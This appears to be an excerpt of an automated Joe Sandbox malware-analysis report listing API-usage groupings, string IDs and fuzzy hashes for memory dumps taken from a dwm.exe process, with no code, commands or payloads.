                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: 53D1F232714B8489E711CFAAE8483DC37B2F354B98F60421ADE9D97B99DB34C626C351
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: b5e493a37247f486d4e511af304c71f74b69f6d6ab4c5d367c9ea779368aa8b9
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 8D016972610B80DAE714EF66E80815977B2F78CF80B294425DF8D43768DF34D561C750
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BAAEDA28DF), ref: 000002BAAEDA2A12
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: 42596948f4be9e1c4baedd15f2e5848b519febb4b5d1f10a6144ff059d0cf004
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: 799105327106548AFB64CF6B98583AD3BB0F354B88F64410ADE8E57B89DB34C695C322
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 0037f0870ebfdb016aa1932559eb3bc75153d745f9a34c3263476bd63a4cccf0
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 58115B26B10F048AFB00DF60E8583A833B4F719B58F540E21EAAD87BA4EF78C164C351
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: 2bcced1576c8107b81588a6f466b45f407658c383511f9b0175cc3c10dfb831f
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: 1A719036200B8256E7759F2AAC583AA77B4F385B84F650016DD8E57F89EF36CE00C752
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 2d589ca2fe90facada70d073e5b9e3fda88d53719ea67fd17517b3d445ac1787
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: C051B533311A008ADB58DF29D48CB6C7BB1F344BA8F954126EB4A87788D77BC841C752
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 0ba0bd4b81d419ba5013f91ef3a057754ff54ab6ed17551e9028579c86221ce1
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 6F51F53A313A408AEB55CF19E48CB6D77B5F354B98F258126DACEA3788DB78C841C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 9c97de133244d466fd9d4f449c096b2ff238832ebb9217629b83df121b1a857d
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 7651E43A311A82AAEB74CF15E44CB6C33B1F344B98F298525EAC647BC9D779C841C715
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 9e7f6acbf74b7a19f5a368e77507c73e2d452fc3a76eb8ba7105daeb0c7a0f4f
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: AA61C033508BC481EB349F15E48479EBBB0F784B98F445216EB8983B99DB7EC190CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 631027331caa43d56e79256c1cf69816f08421b8871a2c17b68a258bd017b566
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: A961EF32509BC482EB318F15E4847DAB7B0F785B98F245216EBCC93B99DBB9D090CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 77d90d6b92ea5bb553dfccb31aec47514666af2ac8d44396a35cae7661ad1a5d
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: A361CC32508BC592EB718F25E44539ABBB0F789B88F684215EBD807F99DB7CC590CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: a2016ffaf16664528dbd7c34dcfa2a8b625362b1d5d64cbad52d52b1f553e444
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 6951F42620478191EA24DE2DB85C3AA77B1F384B90F640025CDDD63F89EB3BCD04C762
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 5d5b9fe66ed7a0b493611d45785aae115f712fb6bdf179b2d195952f945683be
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: C551192624478161EAB6DE2DA45C3AA77F1F398780F780029CDC943F8BDB39C544C762
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 49fdd62030acc719f4bd7a86daf3eeaca2f80af2afb40dbbe80962308d95d0c4
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 49410973625A8086E760DF6AE4487AAB7B0F348784FA44121EECD87758EF38C651C761
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5f14883872db6cc69e978646f2907d5576a4270c535a5ea4fd3ff96dcb071691
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 95410A72615B8096EB70DF69E84879AB7B0F358794F640121EECD87B98EB3CC441C751
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 940565ec5c046a7a3cba980f6eeba56df11988a2f98ee2ec351f5ed982885768
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: EB11FB72614B8082EB618B15F848259B7F5F788B94F684625EECD17BA8EF3DC951CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: fd45eea6e8243d6ee93284cc212565fd665dd89b383d95579792cf4b2c31296b
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 96118C21A01B8095EA15DF6AA80826977B1FB88FD0F695128DECE53B65EF39D952C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 30aa08e9776ea0cad61db7092c1e0e9ae49d84499b26f7f7cbecf5e595806920
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 49E06DB1601604AAE714AF62D80C36937F2FB88F05F54C424C98D07390EF7D85A9C761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 03daca1251b3f575f16d13e208a9cc183863994b71d6e4aa167fd1a4dba97f45
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: B1E03931701A04AAE725AB62E80834937E2EB98B05F548024C98907750EF7D84DDC761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 506ac239137d1aeea9d62bb7478cb15fb7fc01b17476a325a4cb1bb507488526
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 64E012B1611504ABE718AF62DC0836977F2FB8CF15F548464C94D07350EF3C85A9D721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 5474bef31ff282b6388866029c6cd3c63edfe48d2c9275a8bdd1e4d734c1f980
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 6FE0ED71711904AAE729AB62D80825977B2FB98B15F548064C94907710EF3C84DDD621